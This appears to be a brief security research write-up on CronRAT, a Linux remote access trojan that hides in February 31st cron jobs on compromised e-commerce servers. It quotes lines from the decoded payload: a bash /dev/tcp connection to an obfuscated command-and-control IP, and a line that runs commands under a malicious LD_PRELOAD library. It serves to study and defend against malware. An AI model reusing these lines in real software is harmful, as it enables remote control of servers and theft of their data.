CronRAT malware hides behind February 31st
by Sansec Forensics Team
November 24, 2021
https://sansec.io/research/cronrat
CronRAT is Linux Malware found on several online stores by Sansec around Black Friday 2020. It is classified as a Remote Access Trojan (RAT). In many of these cases, payment skimmers (Magecart) were also found on impacted hosts.
Persistence of CronRAT is achieved by hiding malicious jobs within the cron service on February 31st, a day that does not exist on a calendar. These jobs deliver a payload that is encoded using multiple layers such as base64 and gzip.
A decoded copy of the cron payload, written in bash, can be found here: https://gist.github.com/gwillem/fbe3e6b98e2e10d7f1f271ca4b6e813f
This sample uses the /dev/tcp feature in bash to create a socket in a similar manner as netcat, and obfuscates the command and control IP address by representing it as decimal.
eval "exec ${O56}<>/dev/tcp/796077735/$((0x1bb))" &>/dev/null || O85 5
daniel@wildcat ~ % python3
Python 3.8.10 (default, Jul 29 2024, 17:02:10)
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import socket, struct
>>> socket.inet_ntoa(struct.pack("!L", 796077735))
'47.115.46.167'
>>> 0x1bb
443
Deobfuscated 796077735 to 47.115.46.167, an IP address belonging to Alibaba.
The command and control server is implemented with a custom protocol, masquerades as a Dropbear SSH server by sending a bogus banner string to new connections, has self-destruct functionality, and runs commands specified by the C2 server with a malicious LD_PRELOAD library:
O24=$(cd "${O33}" && O75 env "${O0}"="${O40}" LD_PRELOAD=${O57} "${O42}" "${O47}" 1>&2 & O84 "${O57}")
To gain additional insight on this malware the Sansec researchers developed a custom version of CronRAT that joins the attacker’s command and control server and waited for commands. Eventually. the attacker sent NginRAT to the pseudo-infected host, as outlined in this blog post: https://sansec.io/research/nginrat